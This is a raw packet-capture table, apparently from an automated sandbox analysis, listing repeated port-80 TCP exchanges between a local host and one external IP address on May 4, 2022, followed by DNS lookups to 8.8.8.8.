                        May 4, 2022 17:06:21.140008926 CEST804978388.218.168.92192.168.2.4
                        May 4, 2022 17:06:21.140119076 CEST4978380192.168.2.488.218.168.92
                        May 4, 2022 17:06:21.151210070 CEST4978380192.168.2.488.218.168.92
                        May 4, 2022 17:06:21.178055048 CEST804978388.218.168.92192.168.2.4
                        May 4, 2022 17:06:21.178338051 CEST4978380192.168.2.488.218.168.92
                        May 4, 2022 17:06:21.205178976 CEST804978388.218.168.92192.168.2.4
                        May 4, 2022 17:06:21.587323904 CEST804978388.218.168.92192.168.2.4
                        May 4, 2022 17:06:21.587496996 CEST4978380192.168.2.488.218.168.92
                        May 4, 2022 17:06:21.587508917 CEST4978380192.168.2.488.218.168.92
                        May 4, 2022 17:06:21.614312887 CEST804978388.218.168.92192.168.2.4
                        May 4, 2022 17:06:22.859778881 CEST4978480192.168.2.488.218.168.92
                        May 4, 2022 17:06:22.886553049 CEST804978488.218.168.92192.168.2.4
                        May 4, 2022 17:06:22.887769938 CEST4978480192.168.2.488.218.168.92
                        May 4, 2022 17:06:22.890811920 CEST4978480192.168.2.488.218.168.92
                        May 4, 2022 17:06:22.918040991 CEST804978488.218.168.92192.168.2.4
                        May 4, 2022 17:06:22.918585062 CEST4978480192.168.2.488.218.168.92
                        May 4, 2022 17:06:22.945419073 CEST804978488.218.168.92192.168.2.4
                        May 4, 2022 17:06:23.295314074 CEST804978488.218.168.92192.168.2.4
                        May 4, 2022 17:06:23.295447111 CEST4978480192.168.2.488.218.168.92
                        May 4, 2022 17:06:23.295506954 CEST4978480192.168.2.488.218.168.92
                        May 4, 2022 17:06:23.322330952 CEST804978488.218.168.92192.168.2.4
                        May 4, 2022 17:06:27.308404922 CEST4978580192.168.2.488.218.168.92
                        May 4, 2022 17:06:27.335421085 CEST804978588.218.168.92192.168.2.4
                        May 4, 2022 17:06:27.335542917 CEST4978580192.168.2.488.218.168.92
                        May 4, 2022 17:06:27.338927984 CEST4978580192.168.2.488.218.168.92
                        May 4, 2022 17:06:27.365854025 CEST804978588.218.168.92192.168.2.4
                        May 4, 2022 17:06:27.365942955 CEST4978580192.168.2.488.218.168.92
                        May 4, 2022 17:06:27.392983913 CEST804978588.218.168.92192.168.2.4
                        May 4, 2022 17:06:27.621609926 CEST804978588.218.168.92192.168.2.4
                        May 4, 2022 17:06:27.624531984 CEST4978580192.168.2.488.218.168.92
                        May 4, 2022 17:06:27.624591112 CEST4978580192.168.2.488.218.168.92
                        May 4, 2022 17:06:27.651436090 CEST804978588.218.168.92192.168.2.4
                        May 4, 2022 17:06:29.069839954 CEST4978680192.168.2.488.218.168.92
                        May 4, 2022 17:06:29.098524094 CEST804978688.218.168.92192.168.2.4
                        May 4, 2022 17:06:29.098619938 CEST4978680192.168.2.488.218.168.92
                        May 4, 2022 17:06:29.101313114 CEST4978680192.168.2.488.218.168.92
                        May 4, 2022 17:06:29.128873110 CEST804978688.218.168.92192.168.2.4
                        May 4, 2022 17:06:29.129045010 CEST4978680192.168.2.488.218.168.92
                        May 4, 2022 17:06:29.156709909 CEST804978688.218.168.92192.168.2.4
                        May 4, 2022 17:06:29.614717007 CEST804978688.218.168.92192.168.2.4
                        May 4, 2022 17:06:29.614840984 CEST4978680192.168.2.488.218.168.92
                        May 4, 2022 17:06:29.614883900 CEST4978680192.168.2.488.218.168.92
                        May 4, 2022 17:06:29.643647909 CEST804978688.218.168.92192.168.2.4
                        May 4, 2022 17:06:31.261763096 CEST4978780192.168.2.488.218.168.92
                        May 4, 2022 17:06:31.289561033 CEST804978788.218.168.92192.168.2.4
                        May 4, 2022 17:06:31.289726019 CEST4978780192.168.2.488.218.168.92
                        May 4, 2022 17:06:31.292534113 CEST4978780192.168.2.488.218.168.92
                        May 4, 2022 17:06:31.319242954 CEST804978788.218.168.92192.168.2.4
                        May 4, 2022 17:06:31.319397926 CEST4978780192.168.2.488.218.168.92
                        May 4, 2022 17:06:31.346215963 CEST804978788.218.168.92192.168.2.4
                        May 4, 2022 17:06:31.742971897 CEST804978788.218.168.92192.168.2.4
                        May 4, 2022 17:06:31.743388891 CEST4978780192.168.2.488.218.168.92
                        May 4, 2022 17:06:31.743418932 CEST4978780192.168.2.488.218.168.92
                        May 4, 2022 17:06:31.770066977 CEST804978788.218.168.92192.168.2.4
                        May 4, 2022 17:06:33.102663994 CEST4978880192.168.2.488.218.168.92
                        May 4, 2022 17:06:33.129609108 CEST804978888.218.168.92192.168.2.4
                        May 4, 2022 17:06:33.129893064 CEST4978880192.168.2.488.218.168.92
                        May 4, 2022 17:06:33.132720947 CEST4978880192.168.2.488.218.168.92
                        May 4, 2022 17:06:33.160558939 CEST804978888.218.168.92192.168.2.4
                        May 4, 2022 17:06:33.160716057 CEST4978880192.168.2.488.218.168.92
                        May 4, 2022 17:06:33.187868118 CEST804978888.218.168.92192.168.2.4
                        May 4, 2022 17:06:33.611125946 CEST804978888.218.168.92192.168.2.4
                        May 4, 2022 17:06:33.611259937 CEST4978880192.168.2.488.218.168.92
                        May 4, 2022 17:06:33.611287117 CEST4978880192.168.2.488.218.168.92
                        May 4, 2022 17:06:33.638207912 CEST804978888.218.168.92192.168.2.4
                        May 4, 2022 17:06:34.703165054 CEST4978980192.168.2.488.218.168.92
                        May 4, 2022 17:06:34.730082035 CEST804978988.218.168.92192.168.2.4
                        May 4, 2022 17:06:34.730212927 CEST4978980192.168.2.488.218.168.92
                        May 4, 2022 17:06:34.736742973 CEST4978980192.168.2.488.218.168.92
                        May 4, 2022 17:06:34.764790058 CEST804978988.218.168.92192.168.2.4
                        May 4, 2022 17:06:34.764890909 CEST4978980192.168.2.488.218.168.92
                        May 4, 2022 17:06:34.791542053 CEST804978988.218.168.92192.168.2.4
                        May 4, 2022 17:06:35.234499931 CEST804978988.218.168.92192.168.2.4
                        May 4, 2022 17:06:35.235069036 CEST4978980192.168.2.488.218.168.92
                        May 4, 2022 17:06:35.235104084 CEST4978980192.168.2.488.218.168.92
                        May 4, 2022 17:06:35.262434006 CEST804978988.218.168.92192.168.2.4
                        May 4, 2022 17:06:36.240252972 CEST4979080192.168.2.488.218.168.92
                        May 4, 2022 17:06:36.267024040 CEST804979088.218.168.92192.168.2.4
                        May 4, 2022 17:06:36.267221928 CEST4979080192.168.2.488.218.168.92
                        May 4, 2022 17:06:36.270567894 CEST4979080192.168.2.488.218.168.92
                        May 4, 2022 17:06:36.297513962 CEST804979088.218.168.92192.168.2.4
                        May 4, 2022 17:06:36.297709942 CEST4979080192.168.2.488.218.168.92
                        May 4, 2022 17:06:36.324249029 CEST804979088.218.168.92192.168.2.4
                        May 4, 2022 17:06:36.675434113 CEST804979088.218.168.92192.168.2.4
                        May 4, 2022 17:06:36.675549030 CEST4979080192.168.2.488.218.168.92
                        May 4, 2022 17:06:36.675587893 CEST4979080192.168.2.488.218.168.92
                        May 4, 2022 17:06:36.702294111 CEST804979088.218.168.92192.168.2.4
                        May 4, 2022 17:06:38.246164083 CEST4979180192.168.2.488.218.168.92
                        May 4, 2022 17:06:38.273855925 CEST804979188.218.168.92192.168.2.4
                        May 4, 2022 17:06:38.274005890 CEST4979180192.168.2.488.218.168.92
                        May 4, 2022 17:06:38.277874947 CEST4979180192.168.2.488.218.168.92
                        May 4, 2022 17:06:38.306324005 CEST804979188.218.168.92192.168.2.4
                        May 4, 2022 17:06:38.307068110 CEST4979180192.168.2.488.218.168.92
                        May 4, 2022 17:06:38.335371971 CEST804979188.218.168.92192.168.2.4
                        May 4, 2022 17:06:38.732588053 CEST804979188.218.168.92192.168.2.4
                        May 4, 2022 17:06:38.732774973 CEST4979180192.168.2.488.218.168.92
                        May 4, 2022 17:06:38.738375902 CEST4979180192.168.2.488.218.168.92
                        May 4, 2022 17:06:38.765985012 CEST804979188.218.168.92192.168.2.4
                        May 4, 2022 17:06:40.166121006 CEST4979280192.168.2.488.218.168.92
                        May 4, 2022 17:06:40.194969893 CEST804979288.218.168.92192.168.2.4
                        May 4, 2022 17:06:40.195271015 CEST4979280192.168.2.488.218.168.92
                        May 4, 2022 17:06:40.198896885 CEST4979280192.168.2.488.218.168.92
                        May 4, 2022 17:06:40.225837946 CEST804979288.218.168.92192.168.2.4
                        May 4, 2022 17:06:40.226010084 CEST4979280192.168.2.488.218.168.92
                        May 4, 2022 17:06:40.252753019 CEST804979288.218.168.92192.168.2.4
                        May 4, 2022 17:06:40.593791962 CEST804979288.218.168.92192.168.2.4
                        May 4, 2022 17:06:40.593894005 CEST4979280192.168.2.488.218.168.92
                        May 4, 2022 17:06:40.593949080 CEST4979280192.168.2.488.218.168.92
                        May 4, 2022 17:06:40.621208906 CEST804979288.218.168.92192.168.2.4
                        May 4, 2022 17:06:45.989459991 CEST4979380192.168.2.488.218.168.92
                        May 4, 2022 17:06:46.016262054 CEST804979388.218.168.92192.168.2.4
                        May 4, 2022 17:06:46.016347885 CEST4979380192.168.2.488.218.168.92
                        May 4, 2022 17:06:46.019048929 CEST4979380192.168.2.488.218.168.92
                        May 4, 2022 17:06:46.045701027 CEST804979388.218.168.92192.168.2.4
                        May 4, 2022 17:06:46.045844078 CEST4979380192.168.2.488.218.168.92
                        May 4, 2022 17:06:46.072514057 CEST804979388.218.168.92192.168.2.4
                        May 4, 2022 17:06:46.460576057 CEST804979388.218.168.92192.168.2.4
                        May 4, 2022 17:06:46.462450981 CEST4979380192.168.2.488.218.168.92
                        May 4, 2022 17:06:46.462476015 CEST4979380192.168.2.488.218.168.92
                        May 4, 2022 17:06:46.489300966 CEST804979388.218.168.92192.168.2.4
                        May 4, 2022 17:06:47.468368053 CEST4979480192.168.2.488.218.168.92
                        May 4, 2022 17:06:47.495523930 CEST804979488.218.168.92192.168.2.4
                        May 4, 2022 17:06:47.495675087 CEST4979480192.168.2.488.218.168.92
                        May 4, 2022 17:06:47.499152899 CEST4979480192.168.2.488.218.168.92
                        May 4, 2022 17:06:47.526437044 CEST804979488.218.168.92192.168.2.4
                        May 4, 2022 17:06:47.526576042 CEST4979480192.168.2.488.218.168.92
                        May 4, 2022 17:06:47.554976940 CEST804979488.218.168.92192.168.2.4
                        May 4, 2022 17:06:47.985481024 CEST804979488.218.168.92192.168.2.4
                        May 4, 2022 17:06:47.985582113 CEST4979480192.168.2.488.218.168.92
                        May 4, 2022 17:06:47.985682011 CEST4979480192.168.2.488.218.168.92
                        May 4, 2022 17:06:48.012640953 CEST804979488.218.168.92192.168.2.4
                        May 4, 2022 17:06:51.089538097 CEST4979780192.168.2.488.218.168.92
                        May 4, 2022 17:06:51.116646051 CEST804979788.218.168.92192.168.2.4
                        May 4, 2022 17:06:51.118460894 CEST4979780192.168.2.488.218.168.92
                        May 4, 2022 17:06:51.121382952 CEST4979780192.168.2.488.218.168.92
                        May 4, 2022 17:06:51.148314953 CEST804979788.218.168.92192.168.2.4
                        May 4, 2022 17:06:51.150501966 CEST4979780192.168.2.488.218.168.92
                        May 4, 2022 17:06:51.177445889 CEST804979788.218.168.92192.168.2.4
                        May 4, 2022 17:06:51.541780949 CEST804979788.218.168.92192.168.2.4
                        May 4, 2022 17:06:51.541889906 CEST4979780192.168.2.488.218.168.92
                        May 4, 2022 17:06:51.541934013 CEST4979780192.168.2.488.218.168.92
                        May 4, 2022 17:06:51.568814993 CEST804979788.218.168.92192.168.2.4
                        May 4, 2022 17:06:54.163902044 CEST4979880192.168.2.488.218.168.92
                        May 4, 2022 17:06:54.191065073 CEST804979888.218.168.92192.168.2.4
                        May 4, 2022 17:06:54.195616961 CEST4979880192.168.2.488.218.168.92
                        May 4, 2022 17:06:54.199563980 CEST4979880192.168.2.488.218.168.92
                        May 4, 2022 17:06:54.226576090 CEST804979888.218.168.92192.168.2.4
                        May 4, 2022 17:06:54.231190920 CEST4979880192.168.2.488.218.168.92
                        May 4, 2022 17:06:54.258121967 CEST804979888.218.168.92192.168.2.4
                        May 4, 2022 17:06:54.742448092 CEST804979888.218.168.92192.168.2.4
                        May 4, 2022 17:06:54.742602110 CEST4979880192.168.2.488.218.168.92
                        May 4, 2022 17:06:54.742655993 CEST4979880192.168.2.488.218.168.92
                        May 4, 2022 17:06:54.769387007 CEST804979888.218.168.92192.168.2.4
                        May 4, 2022 17:06:57.693589926 CEST4979980192.168.2.488.218.168.92
                        May 4, 2022 17:06:57.721256018 CEST804979988.218.168.92192.168.2.4
                        May 4, 2022 17:06:57.721988916 CEST4979980192.168.2.488.218.168.92
                        May 4, 2022 17:06:57.725161076 CEST4979980192.168.2.488.218.168.92
                        May 4, 2022 17:06:57.752512932 CEST804979988.218.168.92192.168.2.4
                        May 4, 2022 17:06:57.752672911 CEST4979980192.168.2.488.218.168.92
                        May 4, 2022 17:06:57.780514002 CEST804979988.218.168.92192.168.2.4
                        May 4, 2022 17:06:58.254968882 CEST804979988.218.168.92192.168.2.4
                        May 4, 2022 17:06:58.259123087 CEST4979980192.168.2.488.218.168.92
                        May 4, 2022 17:06:58.259159088 CEST4979980192.168.2.488.218.168.92
                        May 4, 2022 17:06:58.286467075 CEST804979988.218.168.92192.168.2.4
                        May 4, 2022 17:07:00.150468111 CEST4980080192.168.2.488.218.168.92
                        May 4, 2022 17:07:00.177289963 CEST804980088.218.168.92192.168.2.4
                        May 4, 2022 17:07:00.177423954 CEST4980080192.168.2.488.218.168.92
                        May 4, 2022 17:07:00.180937052 CEST4980080192.168.2.488.218.168.92
                        May 4, 2022 17:07:00.207884073 CEST804980088.218.168.92192.168.2.4
                        May 4, 2022 17:07:00.208014011 CEST4980080192.168.2.488.218.168.92
                        May 4, 2022 17:07:00.234945059 CEST804980088.218.168.92192.168.2.4
                        May 4, 2022 17:07:00.547756910 CEST804980088.218.168.92192.168.2.4
                        May 4, 2022 17:07:00.547847033 CEST4980080192.168.2.488.218.168.92
                        May 4, 2022 17:07:00.547993898 CEST4980080192.168.2.488.218.168.92
                        May 4, 2022 17:07:00.574687958 CEST804980088.218.168.92192.168.2.4
                        May 4, 2022 17:07:04.538208961 CEST4980180192.168.2.488.218.168.92
                        May 4, 2022 17:07:04.567790031 CEST804980188.218.168.92192.168.2.4
                        May 4, 2022 17:07:04.568520069 CEST4980180192.168.2.488.218.168.92
                        May 4, 2022 17:07:04.571093082 CEST4980180192.168.2.488.218.168.92
                        May 4, 2022 17:07:04.599809885 CEST804980188.218.168.92192.168.2.4
                        May 4, 2022 17:07:04.602770090 CEST4980180192.168.2.488.218.168.92
                        May 4, 2022 17:07:04.630080938 CEST804980188.218.168.92192.168.2.4
                        May 4, 2022 17:07:05.007163048 CEST804980188.218.168.92192.168.2.4
                        May 4, 2022 17:07:05.007287979 CEST4980180192.168.2.488.218.168.92
                        May 4, 2022 17:07:05.009037018 CEST4980180192.168.2.488.218.168.92
                        May 4, 2022 17:07:05.037120104 CEST804980188.218.168.92192.168.2.4
                        May 4, 2022 17:07:06.152303934 CEST4980280192.168.2.488.218.168.92
                        May 4, 2022 17:07:06.179661989 CEST804980288.218.168.92192.168.2.4
                        May 4, 2022 17:07:06.179929972 CEST4980280192.168.2.488.218.168.92
                        May 4, 2022 17:07:06.183458090 CEST4980280192.168.2.488.218.168.92
                        May 4, 2022 17:07:06.212352037 CEST804980288.218.168.92192.168.2.4
                        May 4, 2022 17:07:06.213478088 CEST4980280192.168.2.488.218.168.92
                        May 4, 2022 17:07:06.240677118 CEST804980288.218.168.92192.168.2.4
                        May 4, 2022 17:07:06.643095016 CEST804980288.218.168.92192.168.2.4
                        May 4, 2022 17:07:06.643172026 CEST4980280192.168.2.488.218.168.92
                        May 4, 2022 17:07:06.643218994 CEST4980280192.168.2.488.218.168.92
                        May 4, 2022 17:07:06.670909882 CEST804980288.218.168.92192.168.2.4
                        May 4, 2022 17:07:08.495315075 CEST4980880192.168.2.488.218.168.92
                        May 4, 2022 17:07:08.521954060 CEST804980888.218.168.92192.168.2.4
                        May 4, 2022 17:07:08.522790909 CEST4980880192.168.2.488.218.168.92
                        May 4, 2022 17:07:08.526354074 CEST4980880192.168.2.488.218.168.92
                        May 4, 2022 17:07:08.552974939 CEST804980888.218.168.92192.168.2.4
                        May 4, 2022 17:07:08.553894043 CEST4980880192.168.2.488.218.168.92
                        May 4, 2022 17:07:08.580415964 CEST804980888.218.168.92192.168.2.4
                        May 4, 2022 17:07:09.009329081 CEST804980888.218.168.92192.168.2.4
                        May 4, 2022 17:07:09.011956930 CEST4980880192.168.2.488.218.168.92
                        May 4, 2022 17:07:09.013808012 CEST4980880192.168.2.488.218.168.92
                        May 4, 2022 17:07:09.040302992 CEST804980888.218.168.92192.168.2.4
                        May 4, 2022 17:07:12.418580055 CEST4980980192.168.2.488.218.168.92
                        May 4, 2022 17:07:12.445348978 CEST804980988.218.168.92192.168.2.4
                        May 4, 2022 17:07:12.445517063 CEST4980980192.168.2.488.218.168.92
                        May 4, 2022 17:07:12.448956966 CEST4980980192.168.2.488.218.168.92
                        May 4, 2022 17:07:12.475677013 CEST804980988.218.168.92192.168.2.4
                        May 4, 2022 17:07:12.475779057 CEST4980980192.168.2.488.218.168.92
                        May 4, 2022 17:07:12.503088951 CEST804980988.218.168.92192.168.2.4
                        May 4, 2022 17:07:12.890173912 CEST804980988.218.168.92192.168.2.4
                        May 4, 2022 17:07:12.890314102 CEST4980980192.168.2.488.218.168.92
                        May 4, 2022 17:07:12.890373945 CEST4980980192.168.2.488.218.168.92
                        May 4, 2022 17:07:12.918035984 CEST804980988.218.168.92192.168.2.4
                        May 4, 2022 17:07:15.204993010 CEST4981080192.168.2.488.218.168.92
                        May 4, 2022 17:07:15.231817961 CEST804981088.218.168.92192.168.2.4
                        May 4, 2022 17:07:15.233438015 CEST4981080192.168.2.488.218.168.92
                        May 4, 2022 17:07:15.237173080 CEST4981080192.168.2.488.218.168.92
                        May 4, 2022 17:07:15.264667034 CEST804981088.218.168.92192.168.2.4
                        May 4, 2022 17:07:15.268397093 CEST4981080192.168.2.488.218.168.92
                        May 4, 2022 17:07:15.296889067 CEST804981088.218.168.92192.168.2.4
                        May 4, 2022 17:07:15.612334013 CEST804981088.218.168.92192.168.2.4
                        May 4, 2022 17:07:15.612514019 CEST4981080192.168.2.488.218.168.92
                        May 4, 2022 17:07:15.612538099 CEST4981080192.168.2.488.218.168.92
                        May 4, 2022 17:07:15.639403105 CEST804981088.218.168.92192.168.2.4
                        May 4, 2022 17:07:18.129618883 CEST4981280192.168.2.488.218.168.92
                        May 4, 2022 17:07:18.157061100 CEST804981288.218.168.92192.168.2.4
                        May 4, 2022 17:07:18.157169104 CEST4981280192.168.2.488.218.168.92
                        May 4, 2022 17:07:18.160223961 CEST4981280192.168.2.488.218.168.92
                        May 4, 2022 17:07:18.187243938 CEST804981288.218.168.92192.168.2.4
                        May 4, 2022 17:07:18.187339067 CEST4981280192.168.2.488.218.168.92
                        May 4, 2022 17:07:18.214626074 CEST804981288.218.168.92192.168.2.4
                        May 4, 2022 17:07:18.596982956 CEST804981288.218.168.92192.168.2.4
                        May 4, 2022 17:07:18.597104073 CEST4981280192.168.2.488.218.168.92
                        May 4, 2022 17:07:18.597141027 CEST4981280192.168.2.488.218.168.92
                        May 4, 2022 17:07:18.624001026 CEST804981288.218.168.92192.168.2.4
                        May 4, 2022 17:07:20.594315052 CEST4981380192.168.2.488.218.168.92
                        May 4, 2022 17:07:20.621223927 CEST804981388.218.168.92192.168.2.4
                        May 4, 2022 17:07:20.621418953 CEST4981380192.168.2.488.218.168.92
                        May 4, 2022 17:07:20.640279055 CEST4981380192.168.2.488.218.168.92
                        May 4, 2022 17:07:20.667376041 CEST804981388.218.168.92192.168.2.4
                        May 4, 2022 17:07:20.667494059 CEST4981380192.168.2.488.218.168.92
                        May 4, 2022 17:07:20.695302010 CEST804981388.218.168.92192.168.2.4
                        May 4, 2022 17:07:21.051803112 CEST804981388.218.168.92192.168.2.4
                        May 4, 2022 17:07:21.051937103 CEST4981380192.168.2.488.218.168.92
                        May 4, 2022 17:07:21.255398035 CEST4981380192.168.2.488.218.168.92
                        May 4, 2022 17:07:21.285325050 CEST804981388.218.168.92192.168.2.4
                        May 4, 2022 17:07:24.406440973 CEST4981480192.168.2.488.218.168.92
                        May 4, 2022 17:07:24.433397055 CEST804981488.218.168.92192.168.2.4
                        May 4, 2022 17:07:24.433516979 CEST4981480192.168.2.488.218.168.92
                        May 4, 2022 17:07:24.436443090 CEST4981480192.168.2.488.218.168.92
                        May 4, 2022 17:07:24.463433027 CEST804981488.218.168.92192.168.2.4
                        May 4, 2022 17:07:24.463587999 CEST4981480192.168.2.488.218.168.92
                        May 4, 2022 17:07:24.490372896 CEST804981488.218.168.92192.168.2.4
                        May 4, 2022 17:07:24.858928919 CEST804981488.218.168.92192.168.2.4
                        May 4, 2022 17:07:24.861538887 CEST4981480192.168.2.488.218.168.92
                        May 4, 2022 17:07:24.861568928 CEST4981480192.168.2.488.218.168.92
                        May 4, 2022 17:07:24.888381004 CEST804981488.218.168.92192.168.2.4
                        May 4, 2022 17:07:26.395509958 CEST4981580192.168.2.488.218.168.92
                        May 4, 2022 17:07:26.422075033 CEST804981588.218.168.92192.168.2.4
                        May 4, 2022 17:07:26.422168970 CEST4981580192.168.2.488.218.168.92
                        May 4, 2022 17:07:26.425494909 CEST4981580192.168.2.488.218.168.92
                        May 4, 2022 17:07:26.452145100 CEST804981588.218.168.92192.168.2.4
                        May 4, 2022 17:07:26.452280045 CEST4981580192.168.2.488.218.168.92
                        May 4, 2022 17:07:26.478912115 CEST804981588.218.168.92192.168.2.4
                        May 4, 2022 17:07:26.831839085 CEST804981588.218.168.92192.168.2.4
                        May 4, 2022 17:07:26.831984043 CEST4981580192.168.2.488.218.168.92
                        May 4, 2022 17:07:26.832034111 CEST4981580192.168.2.488.218.168.92
                        May 4, 2022 17:07:26.858576059 CEST804981588.218.168.92192.168.2.4
                        May 4, 2022 17:07:29.223196030 CEST4981680192.168.2.488.218.168.92
                        May 4, 2022 17:07:29.250138044 CEST804981688.218.168.92192.168.2.4
                        May 4, 2022 17:07:29.250262022 CEST4981680192.168.2.488.218.168.92
                        May 4, 2022 17:07:29.254760027 CEST4981680192.168.2.488.218.168.92
                        May 4, 2022 17:07:29.281675100 CEST804981688.218.168.92192.168.2.4
                        May 4, 2022 17:07:29.281842947 CEST4981680192.168.2.488.218.168.92
                        May 4, 2022 17:07:29.308669090 CEST804981688.218.168.92192.168.2.4
                        May 4, 2022 17:07:29.679425955 CEST804981688.218.168.92192.168.2.4
                        May 4, 2022 17:07:29.679517031 CEST4981680192.168.2.488.218.168.92
                        May 4, 2022 17:07:29.679598093 CEST4981680192.168.2.488.218.168.92
                        May 4, 2022 17:07:29.706351042 CEST804981688.218.168.92192.168.2.4
                        May 4, 2022 17:07:32.552755117 CEST4981880192.168.2.488.218.168.92
                        May 4, 2022 17:07:32.579758883 CEST804981888.218.168.92192.168.2.4
                        May 4, 2022 17:07:32.579871893 CEST4981880192.168.2.488.218.168.92
                        May 4, 2022 17:07:32.582865953 CEST4981880192.168.2.488.218.168.92
                        May 4, 2022 17:07:32.609942913 CEST804981888.218.168.92192.168.2.4
                        May 4, 2022 17:07:32.610034943 CEST4981880192.168.2.488.218.168.92
                        May 4, 2022 17:07:32.636995077 CEST804981888.218.168.92192.168.2.4
                        May 4, 2022 17:07:33.087141037 CEST804981888.218.168.92192.168.2.4
                        May 4, 2022 17:07:33.087276936 CEST4981880192.168.2.488.218.168.92
                        May 4, 2022 17:07:33.087306976 CEST4981880192.168.2.488.218.168.92
                        May 4, 2022 17:07:33.114234924 CEST804981888.218.168.92192.168.2.4
                        May 4, 2022 17:07:34.928333998 CEST4981980192.168.2.488.218.168.92
                        May 4, 2022 17:07:34.955007076 CEST804981988.218.168.92192.168.2.4
                        May 4, 2022 17:07:34.955260038 CEST4981980192.168.2.488.218.168.92
                        May 4, 2022 17:07:34.959527016 CEST4981980192.168.2.488.218.168.92
                        May 4, 2022 17:07:34.986718893 CEST804981988.218.168.92192.168.2.4
                        May 4, 2022 17:07:34.986819983 CEST4981980192.168.2.488.218.168.92
                        May 4, 2022 17:07:35.014426947 CEST804981988.218.168.92192.168.2.4
                        May 4, 2022 17:07:35.421030998 CEST804981988.218.168.92192.168.2.4
                        May 4, 2022 17:07:35.421175957 CEST4981980192.168.2.488.218.168.92
                        May 4, 2022 17:07:35.421282053 CEST4981980192.168.2.488.218.168.92
                        May 4, 2022 17:07:35.449486971 CEST804981988.218.168.92192.168.2.4
                        May 4, 2022 17:07:36.134166956 CEST4982080192.168.2.488.218.168.92
                        May 4, 2022 17:07:36.161634922 CEST804982088.218.168.92192.168.2.4
                        May 4, 2022 17:07:36.161756992 CEST4982080192.168.2.488.218.168.92
                        May 4, 2022 17:07:36.164319038 CEST4982080192.168.2.488.218.168.92
                        May 4, 2022 17:07:36.192096949 CEST804982088.218.168.92192.168.2.4
                        May 4, 2022 17:07:36.192192078 CEST4982080192.168.2.488.218.168.92
                        May 4, 2022 17:07:36.218960047 CEST804982088.218.168.92192.168.2.4
                        May 4, 2022 17:07:36.607784033 CEST804982088.218.168.92192.168.2.4
                        May 4, 2022 17:07:36.608023882 CEST4982080192.168.2.488.218.168.92
                        May 4, 2022 17:07:36.610639095 CEST4982080192.168.2.488.218.168.92
                        May 4, 2022 17:07:36.638273954 CEST804982088.218.168.92192.168.2.4
                        TimestampSource PortDest PortSource IPDest IP
                        May 4, 2022 17:05:42.799346924 CEST5480053192.168.2.48.8.8.8
                        May 4, 2022 17:05:43.086805105 CEST53548008.8.8.8192.168.2.4
                        May 4, 2022 17:05:46.100519896 CEST6445453192.168.2.48.8.8.8
                        May 4, 2022 17:05:46.213469028 CEST53644548.8.8.8192.168.2.4
                        May 4, 2022 17:05:50.113938093 CEST6427753192.168.2.48.8.8.8
                        May 4, 2022 17:05:50.132235050 CEST53642778.8.8.8192.168.2.4
                        May 4, 2022 17:05:51.787318945 CEST5607653192.168.2.48.8.8.8
                        May 4, 2022 17:05:51.897289038 CEST53560768.8.8.8192.168.2.4
                        May 4, 2022 17:05:53.764676094 CEST6075853192.168.2.48.8.8.8
                        May 4, 2022 17:05:53.782625914 CEST53607588.8.8.8192.168.2.4
                        May 4, 2022 17:05:55.553795099 CEST6064753192.168.2.48.8.8.8
                        May 4, 2022 17:05:56.551065922 CEST6064753192.168.2.48.8.8.8
                        May 4, 2022 17:05:56.569468975 CEST53606478.8.8.8192.168.2.4
                        May 4, 2022 17:05:56.663363934 CEST53606478.8.8.8192.168.2.4
                        May 4, 2022 17:05:58.351855040 CEST6490953192.168.2.48.8.8.8
                        May 4, 2022 17:05:58.368366957 CEST53649098.8.8.8192.168.2.4
                        May 4, 2022 17:06:01.382014990 CEST5650953192.168.2.48.8.8.8
                        May 4, 2022 17:06:01.400378942 CEST53565098.8.8.8192.168.2.4
                        May 4, 2022 17:06:03.517853975 CEST5406953192.168.2.48.8.8.8
                        May 4, 2022 17:06:03.534624100 CEST53540698.8.8.8192.168.2.4
                        May 4, 2022 17:06:09.089375019 CEST5759453192.168.2.48.8.8.8
                        May 4, 2022 17:06:09.107700109 CEST53575948.8.8.8192.168.2.4
                        May 4, 2022 17:06:10.670600891 CEST6051253192.168.2.48.8.8.8
                        May 4, 2022 17:06:11.001914024 CEST53605128.8.8.8192.168.2.4
                        May 4, 2022 17:06:13.256201982 CEST6136153192.168.2.48.8.8.8
                        May 4, 2022 17:06:13.274743080 CEST53613618.8.8.8192.168.2.4
                        May 4, 2022 17:06:15.851898909 CEST5044553192.168.2.48.8.8.8
                        May 4, 2022 17:06:15.868463039 CEST53504458.8.8.8192.168.2.4
                        May 4, 2022 17:06:18.108508110 CEST5167953192.168.2.48.8.8.8
                        May 4, 2022 17:06:18.127079010 CEST53516798.8.8.8192.168.2.4
                        May 4, 2022 17:06:19.530814886 CEST5247253192.168.2.48.8.8.8
                        May 4, 2022 17:06:19.549356937 CEST53524728.8.8.8192.168.2.4
                        May 4, 2022 17:06:21.093406916 CEST6235453192.168.2.48.8.8.8
                        May 4, 2022 17:06:21.109705925 CEST53623548.8.8.8192.168.2.4
                        May 4, 2022 17:06:22.836616993 CEST5006153192.168.2.48.8.8.8
                        May 4, 2022 17:06:22.855032921 CEST53500618.8.8.8192.168.2.4
                        May 4, 2022 17:06:27.214704037 CEST6061253192.168.2.48.8.8.8
                        May 4, 2022 17:06:27.231436968 CEST53606128.8.8.8192.168.2.4
                        May 4, 2022 17:06:29.050170898 CEST5881653192.168.2.48.8.8.8
                        May 4, 2022 17:06:29.068125963 CEST53588168.8.8.8192.168.2.4
                        May 4, 2022 17:06:31.242187023 CEST5643753192.168.2.48.8.8.8
                        May 4, 2022 17:06:31.260615110 CEST53564378.8.8.8192.168.2.4
                        May 4, 2022 17:06:32.814891100 CEST6482553192.168.2.48.8.8.8
                        May 4, 2022 17:06:33.099653959 CEST53648258.8.8.8192.168.2.4
                        May 4, 2022 17:06:34.682086945 CEST5398953192.168.2.48.8.8.8
                        May 4, 2022 17:06:34.700314999 CEST53539898.8.8.8192.168.2.4
                        May 4, 2022 17:06:36.219078064 CEST6343153192.168.2.48.8.8.8
                        May 4, 2022 17:06:36.238348961 CEST53634318.8.8.8192.168.2.4
                        May 4, 2022 17:06:38.226150990 CEST5690153192.168.2.48.8.8.8
                        May 4, 2022 17:06:38.244344950 CEST53569018.8.8.8192.168.2.4
                        May 4, 2022 17:06:40.145921946 CEST5080053192.168.2.48.8.8.8
                        May 4, 2022 17:06:40.164742947 CEST53508008.8.8.8192.168.2.4
                        May 4, 2022 17:06:45.966592073 CEST5225653192.168.2.48.8.8.8
                        May 4, 2022 17:06:45.984704018 CEST53522568.8.8.8192.168.2.4
                        May 4, 2022 17:06:47.446849108 CEST6108153192.168.2.48.8.8.8
                        May 4, 2022 17:06:47.466262102 CEST53610818.8.8.8192.168.2.4
